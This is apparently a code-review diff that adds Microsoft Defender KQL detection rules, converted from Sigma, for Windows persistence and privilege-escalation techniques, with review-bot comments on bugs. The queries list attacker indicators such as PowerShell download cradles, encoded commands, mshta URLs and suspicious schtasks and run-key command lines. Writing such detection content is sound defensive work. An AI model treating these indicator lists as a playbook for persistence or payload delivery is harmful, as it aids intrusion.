+| where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql
new file mode 100644
index 00000000..fabfa3f6
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql
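Review bot: `ProcessCommandLine contains ":\\ProgramData'"` in the suspicious-path list carries a stray apostrophe, so a payload under `C:\ProgramData\...` is only matched when a single-quoted path happens to close right after `ProgramData`; every sibling term is a bare directory prefix. It should read `ProcessCommandLine contains ":\\ProgramData\\"` (the trailing backslash in the Sigma source was presumably mangled on conversion, so the converter's escaping is worth checking too). Separately, `ProcessCommandLine contains "reg"` is satisfied by almost any string (`regsvr32`, `registry`, a path containing `reg`); `(ProcessCommandLine contains "reg " or ProcessCommandLine contains "reg.exe")` would tighten it without losing the `reg add` form.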
@@ -0,0 +1,12 @@
+// Title: Suspicious Command Patterns In Scheduled Task Creation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
new file mode 100644
index 00000000..644ebc14
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious desktop.ini Action
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+// - Operations performed through Windows SCCM or equivalent
+// - Read only access list authority
+
+DeviceFileEvents
+| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql
new file mode 100644
index 00000000..b804bf04
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Driver Install by pnputil.exe
+// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+// False Positives:
+// - Pnputil.exe being used may be performed by a system administrator.
+// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
new file mode 100644
index 00000000..26d01298
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Get-Variable.exe Creation
+// Author: frack113
+// Date: 2022-04-23
+// Level: high
+// Description: Get-Variable is a valid PowerShell cmdlet
+WindowsApps is by default in the path where PowerShell is executed.
+So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
new file mode 100644
index 00000000..8e91a9e5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious GrpConv Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-19
+// Level: high
+// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
new file mode 100644
index 00000000..a6918cf2
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
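Review bot: The description continuation lines `+WindowsApps is by default in the path ...` and `+So when the Get-Variable command is issued ...` have no `//` prefix, so this file will not parse as KQL. Prefix both with `// ` — `// WindowsApps is by default in the PATH where PowerShell is executed.` and `// So when the Get-Variable command is issued ... instead of looking for the PowerShell cmdlet.`. Since the same pattern shows up wherever the Sigma description spans several lines, the converter's description emitter should comment every line rather than only the first.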
@@ -0,0 +1,12 @@
+// Title: Suspicious GUP Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-06
+// Level: high
+// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
+
+DeviceProcessEvents
+| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
new file mode 100644
index 00000000..1b1cc9ae
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Modification Of Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
+Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
+Instead they modify the task after creation to include their malicious payload
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
new file mode 100644
index 00000000..4e57804a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious NTLM Authentication on the Printer Spooler Service
+// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
+// Date: 2022-05-04
+// Level: high
+// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
new file mode 100644
index 00000000..03b15421
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
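Review bot: The description continuation lines `+Attackers can create a simple looking task ...` and `+Instead they modify the task after creation ...` are written without the `//` prefix, so the file will fail to parse before the query is even evaluated. Prefix both with `// ` (and end the first with a full stop). This hunk starts on the previous line; the point applies to the header comment block only, the `where` clause itself is fine.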
@@ -0,0 +1,12 @@
+// Title: Suspicious Outlook Macro Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql
new file mode 100644
index 00000000..475966e9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell In Registry Run Keys
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects potential PowerShell commands or code within registry run keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate admin or third party scripts. Baseline according to your environment
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
new file mode 100644
index 00000000..bc2e8ac4
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Run Key from Download
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Software installers downloaded and used by users
+
+DeviceRegistryEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql
new file mode 100644
index 00000000..31e5d8f5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious RunAs-Like Flag Combination
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-11
+// Level: medium
+// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql
new file mode 100644
index 00000000..ff0ca567
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Invoking Inline VBScript
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql
new file mode 100644
index 00000000..b6d74d19
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Scheduled Task Creation Involving Temp Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-11
+// Level: high
+// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
new file mode 100644
index 00000000..c3cfc582
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Creation via Masqueraded XML File
+// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
+// Date: 2023-04-20
+// Level: medium
+// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql
new file mode 100644
index 00000000..9543dfc3
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scheduled Task Name As GUID
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: medium
+// Description: Detects creation of a scheduled task with a GUID like name
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Legitimate software naming their tasks as GUIDs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
new file mode 100644
index 00000000..08ba3dcb
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Write to System32 Tasks
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-16
+// Level: high
+// Description: Detects the creation of tasks from processes executed from suspicious locations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql
new file mode 100644
index 00000000..34be5e01
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql
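Review bot: Task XML files under `\Windows\System32\Tasks` are normally written by the Task Scheduler service (an svchost.exe instance) on behalf of schtasks.exe or the COM API, so InitiatingProcessFolderPath in DeviceFileEvents is expected to point at `C:\Windows\System32\svchost.exe` rather than at the process that requested the task — in which case this query only catches a process writing directly into the Tasks folder, a different and much rarer technique than the description "creation of tasks from processes executed from suspicious locations" implies. Worth confirming on a test host before relying on it; if so, reword the description to `// Description: Detects a process running from a user-writable or unusual location writing directly into the System32\Tasks folder (bypassing the Task Scheduler API)` and rely on the DeviceProcessEvents schtasks rules in this patch for the common case. A smaller point: `InitiatingProcessFolderPath contains "C:\\PerfLogs"` is drive-letter anchored while the other two terms are not; `contains ":\\PerfLogs\\"` would be consistent.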
@@ -0,0 +1,10 @@
+// Title: Suspicious Schtasks Execution AppData Folder
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-15
+// Level: high
+// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql
new file mode 100644
index 00000000..b0607d5d
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Type With High Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Some installers were seen using this method of creation unfortunately. Filter them in your environment
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql
new file mode 100644
index 00000000..2b840393
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Types
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects scheduled task creations or modification on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Legitimate processes that run at logon. Filter according to your environment
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
new file mode 100644
index 00000000..17d1a303
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
@@ -0,0 +1,12 @@
